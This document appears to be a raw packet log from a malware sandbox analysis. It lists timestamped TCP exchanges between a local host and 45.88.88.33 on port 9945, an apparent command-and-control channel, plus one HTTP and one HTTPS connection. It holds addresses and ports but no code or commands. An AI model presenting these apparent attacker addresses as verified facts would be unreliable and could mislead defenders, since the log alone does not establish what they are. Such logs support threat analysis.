                                                                          Nov 30, 2024 20:15:45.064009905 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.064033985 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.095820904 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.096040964 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.096095085 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.100446939 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.101727962 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.101775885 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.101938009 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.109997034 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.110511065 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.110559940 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.110637903 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.119079113 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.119132042 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.119317055 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.127768993 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.127818108 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.127928972 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.144701958 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.144925117 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.144936085 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.144985914 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.145740032 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.145786047 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.153302908 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.153502941 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.153548002 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.162112951 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.172493935 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.174302101 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.174499035 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.174546957 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.178144932 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.178370953 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.178411961 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.185828924 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.186038971 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.186099052 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.193074942 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.193311930 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.193353891 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.200727940 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.200970888 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.201014042 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.203737974 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.208741903 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.208755016 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.208827019 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.217411995 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.217425108 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.217470884 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.223793030 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.266241074 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.273454905 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.273668051 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.273725033 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.277771950 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.278013945 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.278057098 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.286428928 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.286658049 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.286699057 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.287779093 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.288017035 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.288079023 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.291418076 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.291646957 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.291682005 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.295094013 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.295336008 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.295382977 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.298697948 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.298921108 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.298958063 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.303792000 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.304054022 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.304104090 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.305958986 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.306206942 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.306246996 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.313260078 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.313488007 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.313535929 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.320554018 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.320775986 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.320818901 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.327841997 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.327997923 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.328047037 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.334440947 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.334685087 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.334732056 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.340739965 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.340924978 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.340962887 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.346549988 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.355086088 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.355293989 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.355343103 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.355782986 CET8049741178.237.33.50192.168.2.4
                                                                          Nov 30, 2024 20:15:45.355829000 CET4974180192.168.2.4178.237.33.50
                                                                          Nov 30, 2024 20:15:45.359407902 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.359628916 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.359671116 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.366220951 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.366266966 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.366451979 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.368069887 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.368249893 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.368292093 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.368953943 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.368997097 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.376821995 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.377007961 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.377053022 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.385428905 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.385648012 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.385690928 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.394042969 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.394273043 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.394309998 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.402721882 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.403012037 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.403060913 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.411334991 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.453743935 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.483678102 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.483855963 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.483939886 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.486231089 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.486471891 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.486519098 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.494970083 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.495146036 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.495191097 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.503601074 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.503794909 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.503843069 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.512271881 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.512470007 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.512506962 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.520960093 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.521131039 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.521171093 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.529582024 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.529829979 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.529875994 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.538302898 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.538494110 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.538528919 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.545598984 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.545841932 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.545881987 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.549782038 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.549961090 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.550003052 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.561831951 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.565381050 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.565567017 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.565613985 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.566572905 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.566817999 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.566862106 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.570698977 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.570924044 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.570975065 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.574841022 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.575078964 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.575136900 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.579067945 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.579257965 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.579297066 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.583075047 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.583275080 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.583324909 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.587177038 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.587377071 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.587426901 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.591304064 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.591533899 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.591581106 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.595374107 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.595612049 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.595654011 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.599536896 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.599733114 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.599778891 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.603611946 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.603840113 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.603893042 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.607733011 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.607961893 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.608011961 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.611804008 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.656881094 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.681962013 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.694122076 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.694295883 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.694500923 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.696105003 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.696856022 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.696907043 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.697084904 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.701044083 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.701258898 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.701334000 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.705144882 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.705355883 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.705425978 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.709218025 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.709280968 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.709505081 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.713321924 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.713367939 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.713582993 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.717485905 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.717539072 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.828473091 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.951167107 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.957541943 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.958775043 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.959057093 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:46.083683968 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:46.263554096 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:46.263637066 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:46.265475035 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:46.391900063 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:48.373955011 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:48.373991966 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:48.374047995 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:48.380639076 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:48.380666971 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:49.791903019 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:49.791975021 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:49.794018984 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:49.794028997 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:49.794272900 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:49.802521944 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:49.843333960 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.330015898 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.330046892 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.330099106 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.330128908 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.425194979 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.425369978 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.425394058 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.530324936 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.530335903 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.530361891 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.530380011 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.530402899 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.530415058 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.553731918 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.553741932 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.553762913 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.553791046 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.553802013 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.553832054 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.576883078 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.576896906 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.576925039 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.576973915 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.576983929 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.577018976 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.617607117 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.617616892 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.617644072 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.617671967 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.617685080 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.617719889 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.710642099 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.710654974 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.710678101 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.710700989 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.710712910 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.710741043 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.728133917 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.728143930 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.728166103 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.728199959 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.728214025 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.728241920 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.744525909 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.744537115 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.744558096 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.744620085 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.744631052 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.744659901 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.760648966 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.760658026 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.760684967 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.760711908 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.760723114 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.760751963 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.778894901 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.778903961 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.778923988 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.778961897 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.778970957 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.779007912 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.788021088 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.788029909 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.788050890 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.788072109 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.788080931 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.788096905 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.797375917 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.797385931 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.797399998 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.797424078 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.797434092 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.797454119 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.832535028 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.832545996 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.832592010 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.832601070 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.902697086 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.902709961 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.902734995 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.902785063 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.902796984 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.902818918 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.910542011 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.910552025 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.910573959 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.910602093 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.910612106 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.910640001 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.919368029 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.919378996 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.919410944 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.919440985 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.919451952 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.919509888 CET49742443192.168.2.481.169.145.163
